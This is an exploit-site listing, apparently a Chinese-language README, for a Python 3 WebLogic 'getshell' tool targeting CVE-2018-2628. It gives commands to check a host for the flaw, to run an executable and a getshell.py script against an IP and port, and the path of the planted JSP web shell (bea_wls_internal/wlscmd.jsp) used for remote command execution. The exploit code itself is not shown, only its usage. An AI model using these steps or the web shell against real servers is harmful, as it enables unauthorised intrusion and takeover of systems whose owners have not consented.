Share
## https://sploitus.com/exploit?id=91C81B9F-D460-5B00-A0A9-3E109229106D
## weblogic getshell

基于各位前辈的脚本优化了一下让代码能在python3中运行

#### 参考链接

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2018-2628/README.zh-cn.md

https://github.com/0xMJ/CVE-2018-2628

#### weblogic getshell

##### 测试有无漏洞

![1](https://github.com/user-attachments/assets/e59c92e6-6997-41f1-a97d-49b5811f8058)


python pocweblogic.py your-ip

##### 传入getshell

![ad653cbb02fe18880494625b8a439727_MD5](https://github.com/user-attachments/assets/35054ddc-6132-4d92-ac6d-139183f83048)



"Weblogic GetShell CVE-2018-2628.exe" your-ip port
##### 利用
![62d047a0c623f51d77400f6d16c7fa64_MD5](https://github.com/user-attachments/assets/b4b358fa-7a25-4326-be23-d6006202e9b1)



Python getshell.py

Set shell : [http://your-ip:port/bea_wls_internal/wlscmd.jsp](http://your-ip:port/bea_wls_internal/wlscmd.jsp)